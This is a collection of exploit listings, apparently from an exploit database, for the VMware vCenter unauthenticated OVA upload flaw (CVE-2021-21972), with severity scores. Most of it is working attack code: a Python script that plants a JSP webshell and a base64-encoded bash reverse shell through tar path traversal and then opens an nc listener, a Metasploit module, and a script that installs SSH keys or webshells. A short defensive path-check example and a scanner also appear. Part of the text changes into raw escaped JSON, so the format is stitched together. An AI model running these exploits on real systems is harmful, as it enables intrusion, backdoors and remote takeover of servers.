def getpath(path="/usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/37/0/h5ngc.war/resources/shell4.jsp"):
    # Seven "../" climb out of the upload directory; the tar member name is the traversal
    fullpath = "../" * 7 + path
    return fullpath.replace('\\', '/').replace('//', '/')


def createbackdoor(localip):
    # shell4.jsp (base64-encoded JSP webshell; the blob is missing from this copy of the listing)
    backdoor = "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"
    backdoor = base64.b64decode(backdoor).decode('utf-8')
    f = open("shell4.jsp", "w")
    f.write(backdoor)
    f.close()
    # reverse.sh
    # After decoding overwrite string 'CUSTOM_IP' for local IP
    shell = "IyEvYmluL2Jhc2gKYmFzaCAtaSA+JiAvZGV2L3RjcC9DVVNUT01fSVAvNDQzIDA+JjE="
    shell = base64.b64decode(shell).decode('utf-8')
    shell = shell.replace('CUSTOM_IP', localip)
    f = open("reverse.sh", "w")
    f.write(shell)
    f.close()
    # Move on with the payload
    payload_file = tarfile.open('payload.tar', 'w')
    myroute = getpath()
    getprompt('Adding web backdoor to archive')
    payload_file.add("shell4.jsp", myroute)
    myroute = getpath("tmp/reverse.sh")
    getprompt('Adding bash backdoor to archive')
    payload_file.add("reverse.sh", myroute)
    payload_file.close()
    # cleaning up a little bit
    os.unlink("reverse.sh")
    os.unlink("shell4.jsp")
    getprompt('Backdoor file just was created.')


def launchexploit(ip):
    res = requests.post('https://' + ip + '/ui/vropspluginui/rest/services/uploadova',
                        files={'uploadFile': open('payload.tar', 'rb')}, verify=False, timeout=60)
    if res.status_code == 200 and res.text == 'SUCCESS':
        getprompt('Backdoor was uploaded successfully!')
        return True
    else:
        getprompt('Backdoor failed to be uploaded. Target denied access.')
        return False


def testshell(ip):
    getprompt('Looking for shell...')
    shell_path = "/ui/resources/shell4.jsp?cmd=uname+-a"
    res = requests.get('https://' + ip + shell_path, verify=False, timeout=60)
    if res.status_code == 200:
        getprompt('Shell was found!.')
        response = res.text
        getprompt('Shell is responsive.')
        try:
            response = re.findall("b>(.+)</", response)[0]
            print('$>uname -a')
            print(response)
        except:
            pass
        return True
    else:
        getprompt('Sorry. Shell was not found.')
        return False


def opendoor(url):
    time.sleep(3)
    getprompt('Executing command.')
    requests.get(url, verify=False, timeout=1800)


def executebackdoor(ip, localip):
    url = "https://" + ip + "/ui/resources/shell4.jsp?cmd=bash%20/tmp/reverse.sh"
    t = threading.Thread(target=opendoor, args=(url,))
    t.start()
    getprompt('Setting up socket ' + localip + ':443')
    os.system('nc -lnvp 443')


if len(sys.argv) == 1:
    myargs.print_help(sys.stderr)
    sys.exit(1)
createbackdoor(args.local)
uploaded = launchexploit(args.target)
if uploaded:
    tested = testshell(args.target)
    if tested:
        executebackdoor(args.target, args.local)
getprompt("Execution completed!")
```

Source: https://0day.today/exploit/36472.

## VMware vCenter 6.5 / 7.0 Remote Code Execution Exploit

Listing type zdt / exploit; last seen 2023-05-27T14:47:07; published 2021-02-24. CVSS v3.1 9.8 CRITICAL, `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` (exploitability 3.9, impact 5.9); CVSS v2 severity HIGH (exploitability 10.0).
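Both vCenter primitives on this page come down to a server joining an attacker-controlled relative path onto a fixed directory: the CEIP module above sends `_i=/../../../../../../etc/cron.d/<name>` to `/analytics/telemetry/ph/api/hyper/send`, and the CVE-2021-21972 exploits (the chacka0101 script above and the Metasploit module further down; the scanner that follows only fingerprints the endpoint) upload a tar whose member names begin with seven `../`. The Python below is an added example, not code from any of those listings: it builds such a tar in memory, resolves each member name and the `_i` value lexically against a base directory, and keeps only what stays inside. `OVA_EXTRACT_DIR` is hypothetical, and `CEIP_DATA_DIR` plus the `.json` suffix are inferred from the CEIP module's crontab cleanup line and `crontab_path`.

```python
"""Path containment for the two vCenter write primitives on this page.

Added example, not code from any listing here. It covers (a) the tar that the
CVE-2021-21972 exploits POST to /ui/vropspluginui/rest/services/uploadova, whose
member names start with "../" so the JSP lands under the vsphere-ui webapp, and
(b) the `_i` parameter of the CVE-2021-22005 endpoint
/analytics/telemetry/ph/api/hyper/send, which the Metasploit module sets to
"/../../../../../../etc/cron.d/<name>". Both base directories are assumptions:
OVA_EXTRACT_DIR is hypothetical, and CEIP_DATA_DIR plus the ".json" suffix are
inferred from the module's crontab cleanup line and crontab_path. Nothing is
written to disk; the tar is built in memory and only paths are resolved.
"""
import io
import posixpath
import tarfile

OVA_EXTRACT_DIR = "/tmp/ova_upload_dir"                # hypothetical
CEIP_DATA_DIR = "/var/log/vmware/analytics/prod/_c_i"  # inferred, see above

# Same target the chacka0101 script's getpath() uses, without the leading slash
SHELL_JSP_TARGET = "usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/37/0/h5ngc.war/resources/shell4.jsp"


def resolve_under(base, relative):
    """Lexically resolve `relative` against `base`; return (final_path, stays_inside)."""
    base = posixpath.normpath(base)
    final = posixpath.normpath(posixpath.join(base, relative.lstrip("/")))
    inside = final == base or final.startswith(base + "/")
    return final, inside


def ceip_write_target(i_param):
    """Where a hyper/send upload with _i=<value> would land (assumed <dir>/<_i>.json)."""
    return resolve_under(CEIP_DATA_DIR, i_param + ".json")


def build_tar(member_name, payload):
    """Build a one-member tar in memory; member_name is attacker-controlled."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        info = tarfile.TarInfo(name=member_name)
        info.size = len(payload)
        tf.addfile(info, io.BytesIO(payload))
    return buf.getvalue()


def audit_tar(tar_bytes, extract_dir):
    """Return [(member_name, resolved_path, safe)] as a safe extractor would decide it.

    Symlinks and hard links are refused outright: a later member could write
    through them even when the link name itself resolves inside the tree.
    """
    rows = []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r") as tf:
        for member in tf.getmembers():
            final, inside = resolve_under(extract_dir, member.name)
            safe = inside and not (member.issym() or member.islnk())
            rows.append((member.name, final, safe))
    return rows


def safe_member_names(tar_bytes, extract_dir):
    """Names an extractor should accept; everything else is dropped before writing."""
    return [name for name, _, safe in audit_tar(tar_bytes, extract_dir) if safe]


if __name__ == "__main__":
    evil = build_tar("../" * 7 + SHELL_JSP_TARGET, b"<%-- jsp --%>")
    for name, final, safe in audit_tar(evil, OVA_EXTRACT_DIR):
        print(("OK   " if safe else "DROP "), name, "->", final)
    print(ceip_write_target("/../../../../../../etc/cron.d/abcd1234"))
    print(ceip_write_target("/telemetry-batch"))
```

Lexical resolution is what an upload handler can do before it writes anything; once the tree exists and symlinks are possible, `realpath` on the parent directory is the stronger check, which is why the audit refuses link members rather than reasoning about them.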
CVSS v2 base score 10.0, `AV:N/AC:L/Au:N/C:C/I:C/A:C` (impact 10.0). CVE-2021-21972; modified 2021-02-24; listing 1337DAY-ID-35863, details at https://0day.today/exploit/description/35863.

This script only checks for the vulnerable upload endpoint: a 405 to a GET on `/ui/vropspluginui/rest/services/uploadova` is taken to mean the endpoint exists. It does not exploit it.

```python
#-*- coding:utf-8 -*-
banner = """
 888888ba dP
 88 `8b 88
 a88aaaa8P' .d8888b. d8888P .d8888b. dP dP
 88 `8b. 88' `88 88 Y8ooooo. 88 88
 88 .88 88. .88 88 88 88. .88
 88888888P `88888P8 dP `88888P' `88888P'
 ooooooooooooooooooooooooooooooooooooooooooooooooooooo
 @time:2021/02/24 CVE-2021-21972.py
 C0de by NebulabdSec - @batsu
 """
print(banner)

import threadpool
import random
import requests
import argparse
import http.client
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
http.client.HTTPConnection._http_vsn = 10
http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'

TARGET_URI = "/ui/vropspluginui/rest/services/uploadova"


def get_ua():
    first_num = random.randint(55, 62)
    third_num = random.randint(0, 3200)
    fourth_num = random.randint(0, 140)
    os_type = [
        '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', '(X11; Linux x86_64)',
        '(Macintosh; Intel Mac OS X 10_12_6)'
    ]
    chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num)

    ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36',
                   '(KHTML, like Gecko)', chrome_version, 'Safari/537.36']
                  )
    return ua


def CVE_2021_21972(url):
    # The key is misspelled ("scoks5"), so requests ignores it and no proxy is used;
    # change it to a real scheme key (and install PySocks) only if you want to proxy.
    proxies = {"scoks5": "http://127.0.0.1:1081"}
    headers = {
        'User-Agent': get_ua(),
        "Content-Type": "application/x-www-form-urlencoded"
    }
    targetUrl = url + TARGET_URI
    try:
        res = requests.get(targetUrl,
                           headers=headers,
                           timeout=15,
                           verify=False,
                           proxies=proxies)
        # proxies={'socks5': 'http://127.0.0.1:1081'})
        # print(len(res.text))
        # A 405 to this GET is taken to mean the upload endpoint exists
        if res.status_code == 405:
            print("[+] URL:{}--------CVE-2021-21972 vulnerability present".format(url))
            # print("[+] Command success result: " + res.text + "\n")
            with open("vulnerable_addresses.txt", 'a') as fw:
                fw.write(url + '\n')
        else:
            print("[-] " + url + " CVE-2021-21972 vulnerability not found.\n")
    # except Exception as e:
    #     print(e)
    except:
        print("[-] " + url + " Request ERROR.\n")


def multithreading(filename, pools=5):
    works = []
    with open(filename, "r") as f:
        for i in f:
            func_params = [i.rstrip("\n")]
            # func_params = [i] + [cmd]
            works.append((func_params, None))
    pool = threadpool.ThreadPool(pools)
    reqs = threadpool.makeRequests(CVE_2021_21972, works)
    [pool.putRequest(req) for req in reqs]
    pool.wait()


def main():
    parser = argparse.ArgumentParser()
    parser.add_argument("-u",
                        "--url",
                        help="Target URL; Example:http://ip:port")
    parser.add_argument("-f",
                        "--file",
                        help="Url File; Example:url.txt")
    # parser.add_argument("-c", "--cmd", help="Commands to be executed; ")
    args = parser.parse_args()
    url = args.url
    # cmd = args.cmd
    file_path = args.file
    if url != None and file_path == None:
        CVE_2021_21972(url)
    elif url == None and file_path != None:
        multithreading(file_path, 10)  # 10 threads (the original comment said "default 15 threads")


if __name__ == "__main__":
    main()
```

Source: https://0day.today/exploit/35863.

## VMware vCenter Server File Upload / Remote Code Execution Exploit

This Metasploit module exploits an unauthenticated OVA file upload and path traversal in VMware vCenter Server to write a JSP payload to a web-accessible directory. Fixed versions are 6.5 Update 3n, 6.7 Update 3l, and 7.0 Update 1c. Note that later vulnerable versions of the Linux appliance aren't exploitable via the webshell technique. Furthermore, writing an SSH public key to `/home/vsphere-ui/.ssh/authorized_keys` works, but the user's non-existent password expires 90 days after install, rendering the technique nearly useless against production environments. You'll have the best luck targeting older versions of the Linux appliance. The Windows target should work ubiquitously.

Listing 1337DAY-ID-35912 (type zdt / exploit): published 2021-03-08, modified 2021-03-08, last seen 2023-05-27T14:47:02; CVE-2021-21972; details at https://0day.today/exploit/description/35912. CVSS v3.1 9.8 CRITICAL, `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` (exploitability 3.9, impact 5.9); CVSS v2 10.0 HIGH, `AV:N/AC:L/Au:N/C:C/I:C/A:C` (exploitability 10.0, impact 10.0).

```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  # "Shotgun" approach to writing JSP
  Rank = ManualRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::CheckModule
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'VMware vCenter Server Unauthenticated OVA File Upload RCE',
        'Description' => %q{
          This module exploits an unauthenticated OVA file upload and path
          traversal in VMware vCenter Server to write a JSP payload to a
          web-accessible directory.

          Fixed versions are 6.5 Update 3n, 6.7 Update 3l, and 7.0 Update 1c.
          Note that later vulnerable versions of the Linux appliance aren't
          exploitable via the webshell technique. Furthermore, writing an SSH
          public key to /home/vsphere-ui/.ssh/authorized_keys works, but the
          user's non-existent password expires 90 days after install, rendering
          the technique nearly useless against production environments.

          You'll have the best luck targeting older versions of the Linux
          appliance. The Windows target should work ubiquitously.
        },
        'Author' => [
          'Mikhail Klyuchnikov', # Discovery
          'wvu', # Analysis and exploit
          'mr_me', # Co-conspirator
          'Viss' # Co-conspirator
        ],
        'References' => [
          ['CVE', '2021-21972'],
          ['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0002.html'],
          ['URL', 'https://swarm.ptsecurity.com/unauth-rce-vmware/'],
          ['URL', 'https://twitter.com/jas502n/status/1364810720261496843'],
          ['URL', 'https://twitter.com/_0xf4n9x_/status/1364905040876503045'],
          ['URL', 'https://twitter.com/HackingLZ/status/1364636303606886403'],
          ['URL', 'https://kb.vmware.com/s/article/2143838'],
          ['URL', 'https://nmap.org/nsedoc/scripts/vmware-version.html']
        ],
        'DisclosureDate' => '2021-02-23', # Vendor advisory
        'License' => MSF_LICENSE,
        'Platform' => ['linux', 'win'],
        'Arch' => ARCH_JAVA,
        'Privileged' => false, # true on Windows
        'Targets' => [
          [
            # TODO: /home/vsphere-ui/.ssh/authorized_keys
            'VMware vCenter Server <= 6.7 Update 1b (Linux)',
            {
              'Platform' => 'linux'
            }
          ],
          [
            'VMware vCenter Server <= 6.7 Update 3j (Windows)',
            {
              'Platform' => 'win'
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'SSL' => true,
          'PAYLOAD' => 'java/jsp_shell_reverse_tcp',
          'CheckModule' => 'auxiliary/scanner/vmware/esx_fingerprint'
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],
          'RelatedModules' => ['auxiliary/scanner/vmware/esx_fingerprint']
        }
      )
    )

    register_options([
      Opt::RPORT(443),
      OptString.new('TARGETURI', [true, 'Base path', '/'])
    ])

    register_advanced_options([
      # /usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/<index>
      OptInt.new('SprayAndPrayMin', [true, 'Deployer index start', 40]), # mr_me
      OptInt.new('SprayAndPrayMax', [true, 'Deployer index stop', 41]) # wvu
    ])
  end

  def spray_and_pray_min
    datastore['SprayAndPrayMin']
  end

  def 
```
spray_and_pray_max\n datastore['SprayAndPrayMax']\n end\n\n def spray_and_pray_range\n (spray_and_pray_min..spray_and_pray_max).to_a\n end\n\n def check\n # Run auxiliary/scanner/vmware/esx_fingerprint\n super\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/ui/vropspluginui/rest/services/getstatus')\n )\n\n unless res\n return CheckCode::Unknown('Target did not respond to check.')\n end\n\n case res.code\n when 200\n # {\"States\":\"[]\",\"Install Progress\":\"UNKNOWN\",\"Config Progress\":\"UNKNOWN\",\"Config Final Progress\":\"UNKNOWN\",\"Install Final Progress\":\"UNKNOWN\"}\n expected_keys = [\n 'States',\n 'Install Progress',\n 'Install Final Progress',\n 'Config Progress',\n 'Config Final Progress'\n ]\n\n if (expected_keys & res.get_json_document.keys) == expected_keys\n return CheckCode::Vulnerable('Unauthenticated endpoint access granted.')\n end\n\n CheckCode::Detected('Target did not respond with expected keys.')\n when 401\n CheckCode::Safe('Unauthenticated endpoint access denied.')\n else\n CheckCode::Detected(\"Target responded with code #{res.code}.\")\n end\n end\n\n def exploit\n upload_ova\n pop_thy_shell # ;)\n end\n\n def upload_ova\n print_status(\"Uploading OVA file: #{ova_filename}\")\n\n multipart_form = Rex::MIME::Message.new\n multipart_form.add_part(\n generate_ova,\n 'application/x-tar', # OVA is tar\n 'binary',\n %(form-data; name=\"uploadFile\"; filename=\"#{ova_filename}\")\n )\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/ui/vropspluginui/rest/services/uploadova'),\n 'ctype' => \"multipart/form-data; boundary=#{multipart_form.bound}\",\n 'data' => multipart_form.to_s\n )\n\n unless res && res.code == 200 && res.body == 'SUCCESS'\n fail_with(Failure::NotVulnerable, 'Failed to upload OVA file')\n end\n\n register_files_for_cleanup(*jsp_paths)\n\n print_good('Successfully uploaded OVA file')\n end\n\n def pop_thy_shell\n jsp_uri =\n case 
target['Platform']\n when 'linux'\n normalize_uri(target_uri.path, \"/ui/resources/#{jsp_filename}\")\n when 'win'\n normalize_uri(target_uri.path, \"/statsreport/#{jsp_filename}\")\n end\n\n print_status(\"Requesting JSP payload: #{full_uri(jsp_uri)}\")\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => jsp_uri\n )\n\n unless res && res.code == 200\n fail_with(Failure::PayloadFailed, 'Failed to request JSP payload')\n end\n\n print_good('Successfully requested JSP payload')\n end\n\n def generate_ova\n ova_file = StringIO.new\n\n # HACK: Spray JSP in the OVA and pray we get a shell...\n Rex::Tar::Writer.new(ova_file) do |tar|\n jsp_paths.each do |path|\n # /tmp/unicorn_ova_dir/../../<path>\n tar.add_file(\"../..#{path}\", 0o644) { |jsp| jsp.write(payload.encoded) }\n end\n end\n\n ova_file.string\n end\n\n def jsp_paths\n case target['Platform']\n when 'linux'\n @jsp_paths ||= spray_and_pray_range.shuffle.map do |idx|\n \"/usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/#{idx}/0/h5ngc.war/resources/#{jsp_filename}\"\n end\n when 'win'\n # Forward slashes work here\n [\"/ProgramData/VMware/vCenterServer/data/perfcharts/tc-instance/webapps/statsreport/#{jsp_filename}\"]\n end\n end\n\n def ova_filename\n @ova_filename ||= \"#{rand_text_alphanumeric(8..42)}.ova\"\n end\n\n def jsp_filename\n @jsp_filename ||= \"#{rand_text_alphanumeric(8..42)}.jsp\"\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/35912", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-09T22:25:43", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, 
"published": "2021-03-01T00:00:00", "type": "zdt", "title": "VMware vCenter Server 7.0 - Unauthenticated File Upload Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-03-01T00:00:00", "id": "1337DAY-ID-35879", "href": "https://0day.today/exploit/description/35879", "sourceData": "# Exploit Title: VMware vCenter Server 7.0 - Unauthenticated File Upload\r\n# Exploit Author: Photubias\r\n# Vendor Advisory: [1] https://www.vmware.com/security/advisories/VMSA-2021-0002.html\r\n# Version: vCenter Server 6.5 (7515524<[vulnerable]<17590285), vCenter Server 6.7 (<17138064) and vCenter Server 7 (<17327517)\r\n# Tested on: vCenter Server Appliance 6.5, 6.7 & 7.0, multiple builds\r\n# CVE: CVE-2021-21972\r\n\r\n#!/usr/bin/env python3\r\n'''\r\n Copyright 2021 Photubias(c) \r\n This program is free software: you can redistribute it and/or modify\r\n it under the terms of the GNU General Public License as published by\r\n the Free Software Foundation, either version 3 of the License, or\r\n (at your option) any later version.\r\n \r\n This program is distributed in the hope that it will be useful,\r\n but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n GNU General Public License for more details.\r\n \r\n You should have received a copy of the GNU General Public License\r\n along with this program. 
If not, see <http://www.gnu.org/licenses/>.\r\n \r\n File name CVE-2021-21972.py\r\n written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be\r\n\r\n CVE-2021-21972 is an unauthenticated file upload and overwrite,\r\n exploitation can be done via SSH public key upload or a webshell\r\n The webshell must be of type JSP, and its success depends heavily on the specific vCenter version\r\n \r\n # Manual verification: https://<ip>/ui/vropspluginui/rest/services/checkmobregister\r\n # A white page means vulnerable\r\n # A 401 Unauthorized message means patched or workaround implemented (or the system is not completely booted yet)\r\n # Notes:\r\n # * On Linux SSH key upload is always best, when SSH access is possible & enabled\r\n # * On Linux the upload is done as user vsphere-ui:users\r\n # * On Windows the upload is done as system user\r\n # * vCenter 6.5 <=7515524 does not contain the vulnerable component \"vropspluginui\"\r\n # * vCenter 6.7U2 and up are running the Webserver in memory, so backdoor the system (active after reboot) or use SSH payload\r\n \r\n This is a native implementation without requirements, written in Python 3.\r\n Works equally well on Windows as Linux (as MacOS, probably ;-)\r\n \r\n Features: vulnerability checker + exploit\r\n'''\r\n\r\nimport os, tarfile, sys, optparse, requests\r\nrequests.packages.urllib3.disable_warnings()\r\n\r\nlProxy = {}\r\nSM_TEMPLATE = b'''<env:Envelope xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:env=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">\r\n <env:Body>\r\n <RetrieveServiceContent xmlns=\"urn:vim25\">\r\n <_this type=\"ServiceInstance\">ServiceInstance</_this>\r\n </RetrieveServiceContent>\r\n </env:Body>\r\n </env:Envelope>'''\r\nsURL = sFile = sRpath = sType = None\r\n\r\ndef parseArguments(options):\r\n global sURL, sFile, sType, sRpath, lProxy\r\n if not options.url or not options.file: exit('[-] Error: please provide at least an URL and 
a FILE to upload.')\r\n sURL = options.url\r\n if sURL[-1:] == '/': sURL = sURL[:-1]\r\n if not sURL[:4].lower() == 'http': sURL = 'https://' + sURL\r\n sFile = options.file\r\n if not os.path.exists(sFile): exit('[-] File not found: ' + sFile)\r\n sType = 'ssh'\r\n if options.type: sType = options.type\r\n if options.rpath: sRpath = options.rpath\r\n else: sRpath = None\r\n if options.proxy: lProxy = {'https': options.proxy}\r\n\r\ndef getVersion(sURL):\r\n def getValue(sResponse, sTag = 'vendor'):\r\n try: return sResponse.split('<' + sTag + '>')[1].split('</' + sTag + '>')[0]\r\n except: pass\r\n return ''\r\n oResponse = requests.post(sURL + '/sdk', verify = False, proxies = lProxy, timeout = 5, data = SM_TEMPLATE)\r\n #print(oResponse.text)\r\n if oResponse.status_code == 200:\r\n sResult = oResponse.text\r\n if not 'VMware' in getValue(sResult, 'vendor'):\r\n exit('[-] Not a VMware system: ' + sURL)\r\n else:\r\n sName = getValue(sResult, 'name')\r\n sVersion = getValue(sResult, 'version') # e.g. 7.0.0\r\n sBuild = getValue(sResult, 'build') # e.g. 
15934073\r\n sFull = getValue(sResult, 'fullName')\r\n print('[+] Identified: ' + sFull)\r\n return sVersion, sBuild\r\n exit('[-] Not a VMware system: ' + sURL)\r\n\r\ndef verify(sURL):\r\n #return True\r\n sURL += '/ui/vropspluginui/rest/services/uploadova'\r\n try:\r\n oResponse = requests.get(sURL, verify=False, proxies = lProxy, timeout = 5)\r\n except:\r\n exit('[-] System not available: ' + sURL)\r\n if oResponse.status_code == 405: return True ## A patched system returns 401, but also if it is not booted completely\r\n else: return False\r\n\r\ndef createTarLin(sFile, sType, sVersion, sBuild, sRpath = None):\r\n def getResourcePath():\r\n oResponse = requests.get(sURL + '/ui', verify = False, proxies = lProxy, timeout = 5)\r\n return oResponse.text.split('static/')[1].split('/')[0]\r\n oTar = tarfile.open('payloadLin.tar','w')\r\n if sRpath: ## version & build not important\r\n if sRpath[0] == '/': sRpath = sRpath[1:]\r\n sPayloadPath = '../../' + sRpath\r\n oTar.add(sFile, arcname=sPayloadPath)\r\n oTar.close()\r\n return 'absolute'\r\n elif sType.lower() == 'ssh': ## version & build not important\r\n sPayloadPath = '../../home/vsphere-ui/.ssh/authorized_keys'\r\n oTar.add(sFile, arcname=sPayloadPath)\r\n oTar.close()\r\n return 'ssh'\r\n elif (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 5) or (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 7 and int(sBuild) < 13010631):\r\n ## vCenter 6.5/6.7 < 13010631, just this location with a subnumber\r\n sPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/%d/0/h5ngc.war/resources/' + os.path.basename(sFile)\r\n print('[!] 
Selected uploadpath: ' + sPayloadPath[5:])\r\n for i in range(112): oTar.add(sFile, arcname=sPayloadPath % i)\r\n oTar.close()\r\n return 'webshell'\r\n elif (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 7 and int(sBuild) >= 13010631):\r\n ## vCenter 6.7 >= 13010631, webshell not an option, but backdoor works when put at /usr/lib/vmware-vsphere-ui/server/static/resources/libs/<thefile>\r\n sPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/static/resources/libs/' + os.path.basename(sFile)\r\n print('[!] Selected uploadpath: ' + sPayloadPath[5:])\r\n oTar.add(sFile, arcname=sPayloadPath)\r\n oTar.close()\r\n return 'backdoor'\r\n else: #(int(sVersion.split('.')[0]) == 7 and int(sVersion.split('.')[1]) == 0):\r\n ## vCenter 7.0, backdoor webshell, but dynamic location (/usr/lib/vmware-vsphere-ui/server/static/resources15863815/libs/<thefile>)\r\n sPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/static/' + getResourcePath() + '/libs/' + os.path.basename(sFile)\r\n print('[!] Selected uploadpath: ' + sPayloadPath[5:])\r\n oTar.add(sFile, arcname=sPayloadPath)\r\n oTar.close()\r\n return 'backdoor'\r\n \r\n\r\ndef createTarWin(sFile, sRpath = None):\r\n ## vCenter only (uploaded as administrator), vCenter 7+ did not exist for Windows\r\n if sRpath:\r\n if sRpath[0] == '/': sRpath = sRpath[:1]\r\n sPayloadPath = '../../' + sRpath\r\n else:\r\n sPayloadPath = '../../ProgramData/VMware/vCenterServer/data/perfcharts/tc-instance/webapps/statsreport/' + os.path.basename(sFile)\r\n oTar = tarfile.open('payloadWin.tar','w')\r\n oTar.add(sFile, arcname=sPayloadPath)\r\n oTar.close()\r\n\r\ndef uploadFile(sURL, sUploadType, sFile):\r\n #print('[!] 
Uploading ' + sFile)\r\n sFile = os.path.basename(sFile)\r\n sUploadURL = sURL + '/ui/vropspluginui/rest/services/uploadova'\r\n arrLinFiles = {'uploadFile': ('1.tar', open('payloadLin.tar', 'rb'), 'application/octet-stream')}\r\n ## Linux\r\n oResponse = requests.post(sUploadURL, files = arrLinFiles, verify = False, proxies = lProxy)\r\n if oResponse.status_code == 200:\r\n if oResponse.text == 'SUCCESS':\r\n print('[+] Linux payload uploaded succesfully.')\r\n if sUploadType == 'ssh':\r\n print('[+] SSH key installed for user \\'vsphere-ui\\'.')\r\n print(' Please run \\'ssh [email\u00a0protected]' + sURL.replace('https://','') + '\\'')\r\n return True\r\n elif sUploadType == 'webshell':\r\n sWebshell = sURL + '/ui/resources/' + sFile\r\n #print('testing ' + sWebshell)\r\n oResponse = requests.get(sWebshell, verify=False, proxies = lProxy)\r\n if oResponse.status_code != 404:\r\n print('[+] Webshell verified, please visit: ' + sWebshell)\r\n return True\r\n elif sUploadType == 'backdoor':\r\n sWebshell = sURL + '/ui/resources/' + sFile\r\n print('[+] Backdoor ready, please reboot or wait for a reboot')\r\n print(' then open: ' + sWebshell)\r\n else: ## absolute\r\n pass\r\n ## Windows\r\n arrWinFiles = {'uploadFile': ('1.tar', open('payloadWin.tar', 'rb'), 'application/octet-stream')}\r\n oResponse = requests.post(sUploadURL, files=arrWinFiles, verify = False, proxies = lProxy)\r\n if oResponse.status_code == 200:\r\n if oResponse.text == 'SUCCESS':\r\n print('[+] Windows payload uploaded succesfully.')\r\n if sUploadType == 'backdoor':\r\n print('[+] Absolute upload looks OK')\r\n return True\r\n else:\r\n sWebshell = sURL + '/statsreport/' + sFile\r\n oResponse = requests.get(sWebshell, verify=False, proxies = lProxy)\r\n if oResponse.status_code != 404:\r\n print('[+] Webshell verified, please visit: ' + sWebshell)\r\n return True\r\n return False\r\n\r\nif __name__ == \"__main__\":\r\n usage = (\r\n 'Usage: %prog [option]\\n'\r\n 'Exploiting Windows & Linux 
vCenter Server\\n'\r\n 'Create SSH keys: ssh-keygen -t rsa -f id_rsa -q -N \\'\\'\\n'\r\n 'Note1: Since the 6.7U2+ (b13010631) Linux appliance, the webserver is in memory. Webshells only work after reboot\\n'\r\n 'Note2: Windows is the most vulnerable, but less mostly deprecated anyway')\r\n\r\n parser = optparse.OptionParser(usage=usage)\r\n parser.add_option('--url', '-u', dest='url', help='Required; example https://192.168.0.1')\r\n parser.add_option('--file', '-f', dest='file', help='Required; file to upload: e.g. id_rsa.pub in case of ssh or webshell.jsp in case of webshell')\r\n parser.add_option('--type', '-t', dest='type', help='Optional; ssh/webshell, default: ssh')\r\n parser.add_option('--rpath', '-r', dest='rpath', help='Optional; specify absolute remote path, e.g. /tmp/testfile or /Windows/testfile')\r\n parser.add_option('--proxy', '-p', dest='proxy', help='Optional; configure a HTTPS proxy, e.g. http://127.0.0.1:8080')\r\n \r\n (options, args) = parser.parse_args()\r\n \r\n parseArguments(options)\r\n \r\n ## Verify\r\n if verify(sURL): print('[+] Target vulnerable: ' + sURL)\r\n else: exit('[-] Target not vulnerable: ' + sURL)\r\n \r\n ## Read out the version\r\n sVersion, sBuild = getVersion(sURL)\r\n if sRpath: print('[!] Ready to upload your 